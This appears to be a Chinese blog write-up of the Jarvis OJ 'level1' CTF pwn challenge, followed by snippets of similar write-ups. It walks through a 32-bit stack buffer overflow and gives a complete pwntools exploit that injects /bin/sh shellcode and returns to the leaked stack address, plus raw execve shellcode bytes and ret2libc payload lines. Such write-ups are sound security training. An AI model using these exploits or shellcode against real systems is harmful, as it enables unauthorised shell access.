Jarvis OJ level1

最新推荐文章于 2024-02-15 11:19:40 发布
最新推荐文章于 2024-02-15 11:19:40 发布
阅读量840 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 溢出攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38204481/article/details/80939042
本文介绍了一个32位程序中的栈溢出漏洞,并详细解释了如何利用此漏洞进行攻击。通过分析程序的保护机制,演示了如何获取栈地址、构造payload并最终实现shellcode的执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

liu@liu-F117-F:~/桌面/oj/level1$ checksec level1
[*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

所有保护全部关闭。是32位的程序
用ida打开

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);
  return read(0, &buf, 0x100u);
}

输入限制为0x100堆栈长度为0x88可以覆盖返回地址,典型的栈溢出模型
没有NX保护,可以直接执行shellcode
用pwntools提供的函数直接生成
asm(shellcraft.sh())。还有一点是这里用的是%p输出的,我们接收到的stack_addr是一个字符串,我们需要转化成10整形才能用p32来打包。
int(“str”,16)把字符串当成16进制数转化为整形。
粘出exp

from pwn import *




context(arch='i386',os='linux')
#p=process("./level1")
p=remote("pwn2.jarvisoj.com",9877)

p.recvuntil("this:")
stack_addr=int(p.recv(10),16)
p.recvline()
print hex(stack_addr)
payload=asm(shellcraft.sh()).ljust(0x88)+"A"*4+p32(stack_addr)
p.sendline(payload)
p.interactive()

导入shellcode 需要:没有NX保护,需要获取到栈的起始地址。
粘出一段linux 32为系统下的system(“//bin/sh”)的生成的shellcode

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
Jarvis OJ level1
Kni9hT's Blog
11-08 649
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
笔记向——PWN jarvis oj level1
m0_52133692的博客
12-07 175
题目链接:https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5 nc pwn2.jarvisoj.com 9877 0x01Linux中分析题目 首先使用file命令,文件为32位 再运行一下文件,提示输入,然后输出hello world 若出现权限不够则使用 chmod 777 文件名 ,打开文件所有权限 使用gdb工具,终端输入gdb,再输入:checksec 文件名,检查保
jarvisoj_level1
m0sway的博客
12-03 2372
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
jarvisoj-level1
qq_35661990的博客
11-08 370
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 922
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
从零开始做题:逆向 ret2libc jarvisoj level1
最新发布
weixin_44626085的博客
02-15 1365
pl ='a' * (0x88 + 0x4 ) + p32(write_plt) + p32(main_addr) +p32(0x1)+p32(write_got)+p32(0x4) # 栈迁移过来后 执行write函数 write后返回main函数 write的三个参数。libc=LibcSearcher('write',write_addr) #根据泄漏的write地址,用LibcSearcher可以找到对应的libc版本,然后找到对应的write函数地址。基本全关,栈可执行。
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 602
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 380
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 406
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 209
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
[BUUCTF]PWN——jarvisoj_level1
mcmuyanga的博客
11-09 1910
jarvisoj_level1 附件 步骤: 例行检查,32位程序,没有开任何保护 本地运行一下程序,看看大概的情况,可以看到输出了一个地址 32位ida载入,习惯性的检索程序里的字符串,没有发现可以直接利用的gates, main函数开始看程序 function函数 参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们 由于没有开启nx,所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可
Jarvis OJlevel1
weixin_43464124的博客
04-22 319
首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后,pwntools这个只能工具就会帮你写出一串shellcode来。 大致是这样的: u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...
PWN_JarvisOJ_Level1
michaelinfinity的博客
03-13 844
首先nc一下 之后我们来看ida反编译 在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数 可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。 从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节 这个题目中没有syste...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 496
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
Jarvis OJ level1题解
educat0r的博客
02-19 631
题目网址https://www.jarvisoj.com/challenges Pwn区level1题 首先把文件放入gdb中用checksec分析 分析发现,没有开启NX保护,说明文件内没有包含system(‘/bin/sh’),说明本题需要自己去构造shellcode。NX保护未开启表示着你输入的东西可执行,所以你需要构造shellcode填充数据,然后利用返回地址再次返回这个变量,就可以执...
Jarvis OJ PWN level1
qq_43409582的博客
09-13 289
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;先看一下保护: 没开保护。 主函数中没写啥东西。。。 接着打开主函数中调用的function, 很明显的一个...
Jarvis OJ pwn——level1
CNS-Enterprise BCC-1701-J
05-27 209
Jarvis OJ 做题练习
jarvis oj---level1解题方法
weixin_45427676的博客
09-29 534
题目场景 nc pwn2.jarvisoj.com 9877 level1.80eacdcd51aca92af7749d96efad7fb5 解题 在vm终端“checksec"查看一下保护机制 没有什么保护,用IDA打开文件 查看vulnerable_function()函数 可以看到栈溢出 我们没有看到system()函数,没有找到"/bin/sh",但是在vulnerable_funct...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值